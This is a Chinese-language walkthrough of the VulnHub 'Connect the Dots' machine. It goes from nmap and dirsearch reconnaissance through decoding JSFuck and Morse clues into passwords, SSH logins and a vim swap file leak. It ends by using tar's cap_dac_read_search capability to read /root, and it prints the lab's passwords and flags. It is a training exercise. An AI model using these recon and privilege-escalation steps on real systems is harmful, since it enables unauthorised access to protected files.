vulnhub靶机 Connect-the-dots
靶机地址Connect The Dots: 1 ~ VulnHub
目标为 普通用户的user.txt和root用户的root.txt
靶机配置
下载好ova之后,使用vm打开导入,务必记得将网络适配器调成与自己kali的网段一致,一般都是nat
渗透测试
使用nmap进行扫描
└─# nmap -p- -sV -T4 192.168.5.128
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-05 11:11 CST
Nmap scan report for 192.168.5.128 (192.168.5.128)
Host is up (0.0017s latency).
Not shown: 65526 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
80/tcp open http Apache httpd 2.4.38 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
2049/tcp open nfs_acl 3 (RPC #100227)
7822/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
33661/tcp open nlockmgr 1-4 (RPC #100021)
34979/tcp open mountd 1-3 (RPC #100005)
50387/tcp open mountd 1-3 (RPC #100005)
55027/tcp open mountd 1-3 (RPC #100005)
MAC Address: 00:0C:29:AC:33:1F (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.05 seconds
发现80端口,则存在网页,对其进行目录扫描
└─# dirsearch -u "http://192.168.5.128/" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 220520
Output File: /root/.dirsearch/reports/192.168.5.128/_21-09-04_23-00-33.txt
Error Log: /root/.dirsearch/logs/errors-21-09-04_23-00-33.log
Target: http://192.168.5.128/
[23:00:33] Starting:
[23:00:33] 301 - 315B - /images -> http://192.168.5.128/images/
[23:00:34] 301 - 315B - /manual -> http://192.168.5.128/manual/
[23:00:35] 301 - 319B - /javascript -> http://192.168.5.128/javascript/
[23:00:51] 200 - 6KB - /backups
[23:01:01] 301 - 315B - /mysite -> http://192.168.5.128/mysite/
[23:03:08] 403 - 301B - /server-status
Task Completed
访问http://192.168.5.128/mysite/
发现其中bootstrap.min.cs 文件 有 jsfuck
在访问http://192.168.5.128/mysite/register.html
之后使用console.log(b1+b2+b3+b4+b5+b6+b7+b8+b9+b10)
进行连接。
将生成的jsfuck进行解密
解密网站为http://codertab.com/JsUnFuck
You're smart enough to understand me.
Here's your secret, TryToGuessThisNorris@2k19
得到一个TryToGuessThisNorris@2k19
提示我们尝试登陆norris
└─# ssh norris@192.168.5.128 -p 7822
norris@192.168.5.128's password:
Linux sirrom 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
###
# # # # ##### # ## ##### # # # ####
# ## # # # # # # # # ## # # #
# # # # # # # # # # # # # # #
# # # # # # # ###### # # # # # # ###
# # ## # # # # # # # # ## # #
### # # # # # # # # # # # ####
Last login: Sun Sep 5 07:13:23 2021 from 192.168.5.129
norris@sirrom:~$
获得user.txt
norris@sirrom:~$ cat user.txt
2c2836a138c0e7f7529aa0764a6414d0
在当前目录发现有个ftp文件夹
norris@sirrom:~$ ls
ftp user.txt
norris@sirrom:~$ cd ftp/files
norris@sirrom:~/ftp/files$ ls -al
total 972
drwxr-xr-x 2 norris norris 4096 Oct 11 2019 .
dr-xr-xr-x 3 nobody nogroup 4096 Oct 11 2019 ..
-r-------- 1 norris norris 6301 Oct 11 2019 backups.bak
-r-------- 1 norris norris 39610 Oct 11 2019 game.jpg.bak
-r-------- 1 norris norris 29 Oct 11 2019 hits.txt.bak
-r-------- 1 norris norris 932659 Oct 11 2019 m.gif.bak
使用ftp登陆
└─# ftp 192.168.5.128
Connected to 192.168.5.128.
220 Welcome to Heaven!
Name (192.168.5.128:root): norris
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 1001 1001 4096 Oct 11 2019 files
226 Directory send OK.
ftp> cd files
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-r-------- 1 1001 1001 6301 Oct 11 2019 backups.bak
-r-------- 1 1001 1001 39610 Oct 11 2019 game.jpg.bak
-r-------- 1 1001 1001 29 Oct 11 2019 hits.txt.bak
-r-------- 1 1001 1001 932659 Oct 11 2019 m.gif.bak
226 Directory send OK.
ftp> get game.jpg.bak
local: game.jpg.bak remote: game.jpg.bak
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for game.jpg.bak (39610 bytes).
226 Transfer complete.
39610 bytes received in 0.00 secs (116.5896 MB/s)
└─# exiftool game.jpg.bak
ExifTool Version Number : 12.16
File Name : game.jpg.bak
Directory : .
File Size : 39 KiB
File Modification Date/Time : 2021:09:05 11:24:39+08:00
File Access Date/Time : 2021:09:05 11:24:39+08:00
File Inode Change Date/Time : 2021:09:05 11:24:39+08:00
File Permissions : rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 192
Y Resolution : 192
Exif Byte Order : Big-endian (Motorola, MM)
Orientation : Horizontal (normal)
Comment : .... . -.-- ....... -. --- .-. .-. .. ... --..-- ....... -.-- --- ..- .----. ...- . ....... -- .- -.. . ....... - .... .. ... ....... ..-. .- .-. .-.-.- ....... ..-. .- .-. ....... ..-. .- .-. ....... ..-. .-. --- -- ....... .... . .- ...- . -. ....... .-- .- -. -. .- ....... ... . . ....... .... . .-.. .-.. ....... -. --- .-- ..--.. ....... .... .- .... .- ....... -.-- --- ..- ....... ... ..- .-. . .-.. -.-- ....... -- .. ... ... . -.. ....... -- . --..-- ....... -.. .. -.. -. .----. - ....... -.-- --- ..- ..--.. ....... --- .... ....... -.. .- -- -. ....... -- -.-- ....... -... .- - - . .-. -.-- ....... .. ... ....... .- -... --- ..- - ....... - --- ....... -.. .. . ....... .- -. -.. ....... .. ....... .- -- ....... ..- -. .- -... .-.. . ....... - --- ....... ..-. .. -. -.. ....... -- -.-- ....... -.-. .... .- .-. --. . .-. ....... ... --- ....... --.- ..- .. -.-. -.- .-.. -.-- ....... .-.. . .- ...- .. -. --. ....... .- ....... .... .. -. - ....... .. -. ....... .... . .-. . ....... -... . ..-. --- .-. . ....... - .... .. ... ....... ... -.-- ... - . -- ....... ... .... ..- - ... ....... -.. --- .-- -. ....... .- ..- - --- -- .- - .. -.-. .- .-.. .-.. -.-- .-.-.- ....... .. ....... .- -- ....... ... .- ...- .. -. --. ....... - .... . ....... --. .- - . .-- .- -.-- ....... - --- ....... -- -.-- ....... -.. ..- -. --. . --- -. ....... .. -. ....... .- ....... .----. ... . -.-. .-. . - ..-. .. .-.. . .----. ....... .-- .... .. -.-. .... ....... .. ... ....... .--. ..- -... .-.. .. -.-. .-.. -.-- ....... .- -.-. -.-. . ... ... .. -... .-.. . .-.-.-
Image Width : 712
Image Height : 350
Encoding Process : Progressive DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 712x350
Megapixels : 0.249
将摩斯密码进行解密
解密网站https://gchq.github.io/CyberChef/
解密发现关键词 'SECRETFILE’在/var/www/html中发现目标,其中.swp是编辑器突然断电或者 ctrl+z 产生的文件
norris@sirrom:/var/www/html$ ls -al
total 368
drwxr-xr-x 4 root root 4096 Oct 11 2019 .
drwxr-xr-x 3 root root 4096 Oct 11 2019 ..
-rw-r--r-- 1 www-data www-data 6301 Oct 11 2019 backups
-rw-r--r-- 1 www-data www-data 325 Oct 11 2019 backups.html
-rw-r--r-- 1 www-data www-data 78635 Oct 10 2019 bootstrap.bundle.min.js
-rw-r--r-- 1 www-data www-data 155758 Oct 10 2019 bootstrap.min.css
-rw-r--r-- 1 www-data www-data 44 Oct 11 2019 hits.txt
drwxr-xr-x 2 www-data www-data 4096 Oct 11 2019 images
-rw-r--r-- 1 www-data www-data 2186 Oct 11 2019 index.htm
-rw-r--r-- 1 www-data www-data 1964 Oct 11 2019 index.html
-rw-r--r-- 1 www-data www-data 71037 Oct 10 2019 jquery.slim.min.js
-rw-r--r-- 1 www-data www-data 879 Oct 11 2019 landing.css
drwxr-xr-x 2 www-data www-data 4096 Oct 11 2019 mysite
-rw-r--r-- 1 www-data www-data 99 Oct 11 2019 secretfile
-rw------- 1 www-data www-data 12288 Oct 11 2019 .secretfile.swp
在kali下载这个文件
└─# wget http://192.168.5.128/.secretfile.swp
--2021-09-05 10:40:48-- http://192.168.5.128/.secretfile.swp
正在连接 192.168.5.128:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:12288 (12K)
正在保存至: “.secretfile.swp”
.secretfile.swp 100%[======================================================================================================================>] 12.00K --.-KB/s 用时 0s
2021-09-05 10:40:48 (212 MB/s) - 已保存 “.secretfile.swp” [12288/12288])
使用strings
查看文件中的字符串
└─# strings .secretfile.swp 127 ⨯
b0VIM 8.1
root
sirrom
/var/www/html/secretfile
U3210
#"!
blehguessme090
I see you're here for the password. Holy Moly! Battery is dying !! Mentioning below for reference..
获取到一个密码blehguessme090
配合showmount获得的morris用户可以进行ssh登录。
└─# showmount -e 192.168.5.128
Export list for 192.168.5.128:
/home/morris *
└─# ssh morris@192.168.5.128 -p 7822
morris@192.168.5.128's password:
Linux sirrom 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
###
# # # # ##### # ## ##### # # # ####
# ## # # # # # # # # ## # # #
# # # # # # # # # # # # # # #
# # # # # # # ###### # # # # # # ###
# # ## # # # # # # # # ## # #
### # # # # # # # # # # # ####
Last login: Sun Sep 5 08:14:59 2021 from 192.168.5.129
morris@sirrom:~$ sudo -l
[sudo] password for morris:
Sorry, user morris may not run sudo on sirrom.
但是权限和norris一样,故还是继续使用norris进行下面的操作
使用getcap查找可利用的命令,发现tar可以绕过文件的读权限检查和目录的读和执行权限检查。
norris@sirrom:/var/www/html$ /sbin/getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/tar = cap_dac_read_search+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/bin/ping = cap_net_raw+ep
capacity可以理解成把root的权限分割成很多部分给普通用户去使用。每个权限都会有不一样的功能。对应的命令是getcap
/sbin/getcap -r / 2>/dev/null
/sbin=超级用户指令系统管理命令,这里存放的是系统管理员使用的程序
/getcap -r = 查找setcap所设置的文件
2=错误模式输出后面可以理解为如果有错误报告会直接删除不会显示
/dev/null=linux的垃圾桶
使用tar 打包/root目录,并获取root.txt
norris@sirrom:~$ tar -zcvf root.tar.gz /root
tar: Removing leading `/' from member names
/root/
/root/root.txt
/root/.bashrc
/root/.gnupg/
/root/.gnupg/private-keys-v1.d/
/root/.bash_history
/root/.cache/
/root/.local/
/root/.local/share/
/root/.local/share/nano/
/root/.profile
norris@sirrom:~$ ls
ftp root.tar.gz user.txt
norris@sirrom:~$ tar -zxvf root.tar.gz
root/
root/root.txt
root/.bashrc
root/.gnupg/
root/.gnupg/private-keys-v1.d/
root/.bash_history
root/.cache/
root/.local/
root/.local/share/
root/.local/share/nano/
root/.profile
norris@sirrom:~$ ls
ftp root root.tar.gz user.txt
norris@sirrom:~$ cd root/
norris@sirrom:~/root$ ls
root.txt
norris@sirrom:~/root$ pwd
/home/norris/root
norris@sirrom:~/root$ cat root.txt
8fc9376d961670ca10be270d52eda423
注意事项
nmap 如果不加 -p-则不会扫出7822这个端口